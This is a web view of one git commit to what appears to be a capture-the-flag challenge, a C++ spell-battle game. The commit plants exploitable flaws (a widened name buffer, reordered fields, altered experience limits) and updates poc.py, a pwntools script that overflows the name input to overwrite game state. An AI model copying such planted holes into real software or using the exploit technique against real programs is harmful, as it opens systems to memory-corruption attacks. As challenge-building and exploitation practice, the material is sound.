Browse Source

update

master
myitinos 5 years ago
parent
commit
966a703dc9
5 changed files with 52 additions and 11 deletions
  1. +2
    -1
      lib/Battle.cpp
  2. +2
    -2
      lib/Character.cpp
  3. +1
    -1
      lib/Character.hpp
  4. +1
    -1
      lib/Spell.hpp
  5. +46
    -6
      poc.py

+ 2
- 1
lib/Battle.cpp View File

@ -1,6 +1,7 @@
#include "Battle.hpp" #include "Battle.hpp"
std::vector<Spell> Battle::SPELL_BOOK = { std::vector<Spell> Battle::SPELL_BOOK = {
Spell("FLAG STEAL", Spell::TYPE_DESTRUCTION, 1000000, 1),
Spell("Blazing Storm", Spell::TYPE_DESTRUCTION, 10, 5), Spell("Blazing Storm", Spell::TYPE_DESTRUCTION, 10, 5),
Spell("Energy Arrow", Spell::TYPE_DESTRUCTION, 40, 10), Spell("Energy Arrow", Spell::TYPE_DESTRUCTION, 40, 10),
Spell("Pyro Strike", Spell::TYPE_DESTRUCTION, 90, 15), Spell("Pyro Strike", Spell::TYPE_DESTRUCTION, 90, 15),
@ -162,7 +163,7 @@ void Battle::start()
UserInterface::print(buff); UserInterface::print(buff);
} }
choiceInt = (random() % (player2.getLevel() < SPELL_BOOK.size() ? player2.getLevel() : SPELL_BOOK.size())) + 1;
choiceInt = (this->turn % (player2.getLevel() < SPELL_BOOK.size() ? player2.getLevel() : SPELL_BOOK.size())) + 1;
if (player2.canCastSpell(SPELL_BOOK.at(choiceInt))) if (player2.canCastSpell(SPELL_BOOK.at(choiceInt)))
{ {
player2.castSpell(SPELL_BOOK.at(choiceInt), player1); player2.castSpell(SPELL_BOOK.at(choiceInt), player1);

+ 2
- 2
lib/Character.cpp View File

@ -4,7 +4,7 @@
#include "Character.hpp" #include "Character.hpp"
const long Character::MAX_LVL = 1000000L; const long Character::MAX_LVL = 1000000L;
const long Character::MAX_EXP = i">1000000000000L;
const long Character::MAX_EXP = h">0x1fffffffffffffff;
Character::Character(const char *characterName, Character::Character(const char *characterName,
long characterLevel) long characterLevel)
@ -52,7 +52,7 @@ long Character::getLevel()
long Character::getExperience() long Character::getExperience()
{ {
if (experience > Character::MAX_LVL)
if (experience > Character::MAX_EXP)
{ {
exit(-1); exit(-1);
} }

+ 1
- 1
lib/Character.hpp View File

@ -12,8 +12,8 @@ protected:
static const long MAX_EXP; static const long MAX_EXP;
char name[32]; char name[32];
long level;
long experience; long experience;
long level;
long maxHP; long maxHP;
long maxMP; long maxMP;
long curHP; long curHP;

+ 1
- 1
lib/Spell.hpp View File

@ -4,7 +4,7 @@
class Spell class Spell
{ {
protected: protected:
char name[16];
char name[64];
int type; int type;
int power; int power;
int cost; int cost;

+ 46
- 6
poc.py View File

@ -1,9 +1,10 @@
from pwn import *
from pwn import process
if __name__ == "__main__":
p = process("./main")
def poc0():
p = process("./spell-warz-again")
print p.recvuntil(">") print p.recvuntil(">")
p.sendline(("A" * 16) + ("\xff\xff\xff\x0f\x01"))
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
print p.recvuntil(">") print p.recvuntil(">")
p.sendline("y") p.sendline("y")
print p.recvuntil(">") print p.recvuntil(">")
@ -12,7 +13,46 @@ if __name__ == "__main__":
p.sendline("4") p.sendline("4")
print p.recvuntil(">") print p.recvuntil(">")
p.sendline("y") p.sendline("y")
for i in xrange(99):
for _ in xrange(10):
print p.recvuntil(">") print p.recvuntil(">")
p.sendline("9")
p.sendline("100")
p.interactive()
def poc1():
p = process("./spell-warz-again")
print p.recvuntil(">")
p.sendline("Leo")
print p.recvuntil(">")
p.sendline("y")
print p.recvuntil(">")
p.sendline("2")
print p.recvuntil(">")
p.sendline("4")
print p.recvuntil(">")
p.sendline("y")
print p.recvuntil(">")
p.sendline("0")
p.interactive() p.interactive()
def poc2():
p = process("./spell-warz-again")
print p.recvuntil(">")
p.sendline("__th3_w0rLd_D3str0Y3r__")
print p.recvuntil(">")
p.sendline("y")
print p.recvuntil(">")
p.sendline("2")
print p.recvuntil(">")
p.sendline("4")
print p.recvuntil(">")
p.sendline("y")
for _ in xrange(10):
print p.recvuntil(">")
p.sendline("100")
p.interactive()
if __name__ == "__main__":
poc0()

Loading…
Cancel
Save